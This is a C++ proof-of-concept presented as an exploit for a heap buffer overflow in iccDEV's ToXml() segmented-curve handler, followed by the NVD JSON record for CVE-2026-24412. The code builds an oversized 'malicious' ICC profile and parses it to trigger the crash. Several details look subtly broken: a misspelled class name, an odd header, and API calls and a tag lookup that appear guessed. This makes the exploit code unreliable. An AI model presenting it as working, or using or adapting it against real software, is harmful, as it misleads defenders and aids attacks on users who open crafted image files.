CVE-2026-24412

#include <cstdio> #include <cstdlib> #include <cstring> #include <fstream> #include "iccd.h" // PoC for CVE-2026-24412: Heap Buffer Overflow in CIccTagXmlSegmentedCurve::ToXml() // Affected: iccDEV <= 2.3.1.1 // Create a malicious ICC profile with oversized CIccTagXmlSegmentedCurve data void create_malicious_icc_profile(const char* filename) { // Create a basic ICC profile structure CIccProfile profile; // Create a CIccTagXmlSegmentedCurve with oversized data // This triggers heap buffer overflow in ToXml() function CIccTagXmlSegmentedCurve* pTag = new CIccTagXmlSegmenteCurve(); // Construct malicious curve data that exceeds buffer bounds // The overflow occurs when ToXml() processes this data std::vector<icdFloat32> maliciousCurveData; for (int i = 0; i < 100000; i++) { // Unusually large size maliciousCurveData.push_back((icdFloat32)i / 100000.0f); } // Attach the malicious curve to the tag pTag->SetCurveData(maliciousCurveData); // Add the tag to the profile profile.AppendTag(pTag); // Write the malicious profile to file std::ofstream outFile(filename, std::ios::binary); if (outFile.is_open()) { profile.Write(&outFile); outFile.close(); printf("Malicious ICC profile created: %s\n", filename); } } // Parse and trigger the vulnerability void trigger_vulnerability(const char* filename) { std::ifstream inFile(filename, std::ios::binary); if (!inFile.is_open()) { printf("Failed to open file: %s\n", filename); return; } CIccProfile profile; // This will trigger ToXml() and cause heap buffer overflow if (profile.Read(&inFile)) { CIccTag* pTag = profile.FindTag("CIccTagXmlSegmentedCurve"); if (pTag) { std::string xmlOutput; // Heap buffer overflow occurs here in ToXml() pTag->ToXml(&xmlOutput); } } inFile.close(); } int main(int argc, char* argv[]) { const char* outputFile = "malicious_profile.icc"; printf("CVE-2026-24412 PoC - Heap Buffer Overflow in iccDEV\n"); printf("======================================================\n"); // Step 1: Create malicious ICC profile create_malicious_icc_profile(outputFile); // Step 2: Trigger the vulnerability trigger_vulnerability(outputFile); return 0; }

{"cve": {"id": "CVE-2026-24412", "sourceIdentifier": "[email protected]", "published": "2026-01-24T02:15:49.360", "lastModified": "2026-01-30T18:25:05.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores tienen una vulnerabilidad de desbordamiento de búfer de pila en la función CIccTagXmlSegmentedCurve::ToXml(). Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. Este problema ha sido solucionado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/2be3b125933a57fe8b6624e9dfd69d8e5360bf70", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/518", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6rf4-63j2-cfrf", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}